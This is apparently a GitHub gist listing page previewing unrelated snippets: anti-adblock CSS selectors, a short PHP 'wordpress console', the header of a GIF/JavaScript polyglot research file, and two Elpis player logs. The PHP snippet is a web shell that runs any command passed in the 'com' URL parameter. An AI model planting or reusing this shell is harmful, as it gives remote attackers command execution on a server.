View gist:9be919ebaecb62e509704781cc492e83
.abp_ob_exist, .adblock_msg, .adblocker-wrap, .adBlockWarning, #anti_adblock, #adb-enabled, .noadblock, .adblockOverlay, .ad-blocker-warning, #adblock_detected, #adBlockAlert, .dispositifAdblock, .adbd-wrapper, .AdblockMessage, #adblock-box, .adblock_floating_message, .adblocker-message, .adBlockNotificationOverlay, #advertisementjsalert, #adb-actived, .kill-adblock-container, .adblock-warning-teaser, .ad-blocked, #adblockDetect, #abp-killer, .deadblocker-header-bar-inner, .adbd-message, #message_adblock, #adblock-alert, #adblock_message, .adBlockNotification, #adblocker_modal_overlay, #adBlockerModal, .js-checkad-warning, .adblock-notification-wrapper, .ad-block-message, #adblock-overlay, #AdBlockDialog, .deadblocker-header-bar, .adbd-background, #fnAdblockingOverlay, #adb-warning, .diysdk_webServices_banners1und1MainContent, [class][data-sitename][data-header-version] > div[id^="detection-block"], #adblock_screen, .adblock_enabled, .adBlockDetectedSign, #adblocker_message, #adBlockDetect, .dispositifAdblock |
View wordpress console
echo "command: ".stripslashes(urldecode($_GET['com'])) ."<br/>"; | |
echo nl2br( shell_exec ( stripslashes( urldecode($_GET['com']) ) ." 2>&1" ) ); | |
echo "<br/>"; | |
die; |
View gifjs.asm
; a hand-made GIF containing valid JavaScript code | |
; abusing header to start a JavaScript comment | |
; inspired by Saumil Shah's Deadly Pixels presentation | |
; Ange Albertini, BSD Licence 2013 | |
; yamal gifjs.asm -o img.gif | |
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment |
View gist:1c99312b36f07627f05c
[11:02:27.053] Checking for updates... | |
[11:02:27.054] Downloading update file: http://elpis.adamhaile.net/update/version.config?r=1391270547 | |
[11:02:28.574] Info: BASS: Initialize BASS environment ... | |
[11:02:28.589] Info: BASS: Loading AAC Decoder | |
[11:02:28.592] Debug: BASS: Added DecoderPlugin: C:\Program Files (x86)\Elpis\bass_aac.dll | |
[11:02:28.592] Info: BASS: Initializing BASS environment done. | |
[11:02:28.594] Info: BASS: Initializing BASS audio engine... | |
[11:02:28.594] Info: BASS: Using default Sound Device | |
[11:02:29.937] Info: BASS: Initialization done. | |
[11:02:30.165] Connect |
View gist:3c4bce3e4367e6fb6c14
[10:59:53.893] Checking for updates... | |
[10:59:53.894] Downloading update file: http://elpis.adamhaile.net/update/version.config?r=1391270393 | |
[10:59:55.499] Info: BASS: Initialize BASS environment ... | |
[10:59:55.511] Info: BASS: Loading AAC Decoder | |
[10:59:55.514] Debug: BASS: Added DecoderPlugin: C:\Program Files (x86)\Elpis\bass_aac.dll | |
[10:59:55.514] Info: BASS: Initializing BASS environment done. | |
[10:59:55.515] Info: BASS: Initializing BASS audio engine... | |
[10:59:55.516] Info: BASS: Using default Sound Device | |
[10:59:56.858] Info: BASS: Initialization done. | |
[10:59:57.152] Connect |